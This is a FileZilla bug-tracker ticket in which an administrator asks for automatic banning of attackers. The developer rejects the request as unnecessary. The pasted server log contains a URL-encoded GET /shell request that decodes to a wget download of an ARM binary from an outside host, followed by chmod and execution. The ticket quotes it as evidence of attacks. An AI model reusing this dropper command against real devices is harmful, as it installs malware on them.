Opened 6 years ago

Closed 6 years ago

#11516 closed Feature request (rejected)

Increase in remote attacks against FileZilla FTP Server - Can better protection be implemented

Reported by: surr34l Owned by:
Priority: normal Component: FileZilla Server
Keywords: security attacks protection Cc:
Component version: Operating system type: Windows
Operating system version: Windows 10 1709


I've seen an increase in attacks against FileZilla FTP Server installs I'm administering.

While it looks like these attacks are unsuccessful, they are getting annoying, and I'd like to ensure my installs are as protected as possible. They are on high ports, but security by obscurity is not real security, only a deterrent until port scanners come along and information is passed around.

(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> Connected on port [serverport], sending welcome message...
(002024)2/7/2018 8:12:33 AM - (not logged in) (123.249.XXX.XXX)> GET / HTTP/1.1
(002059)2/12/2018 20:34:06 PM - (not logged in) (> GET /shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D HTTP/1.1
(002059)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Referer: http://filezilla.server.ip.address:port/shell?%77%67%65%74%20%2D%50%20%2F%74%6D%70%20%68%74%74%70%3A%2F%2F%68%66%73%2E%6D%68%61%63%6B%65%72%2E%63%63%3A%39%32%37%38%2F%6C%69%6E%75%78%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D%3B%2F%74%6D%70%2F%6C%69%6E%75%78%2E%61%72%6D
(002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Accept-Language: zh-cn
(002060)2/12/2018 20:34:06 PM - (not logged in) (104.207.XXX.XXX)> Host: filezilla.server.ip.address:port

Manual entry and maintenance of an IP Blacklist is cumbersome and time consuming, as indicated here -

I would like to see an option to automatically implement kick and ban length already configured in settings for specific commands coming in that match attack patterns, even if I have to maintain my own list of patterns.

More complete logs can also be provided upon request, as there are a lot more entries with each attempt mucking up my logs and console.

Change History (1)

comment:1 by Tim Kosse, 6 years ago

Resolution: rejected
Status: newclosed

You can safely ignore these connections, they are utterly harmless.

In a future version a feature will be added to not show connections from non-logged in users in the log.

Note: See TracTickets for help on using tickets.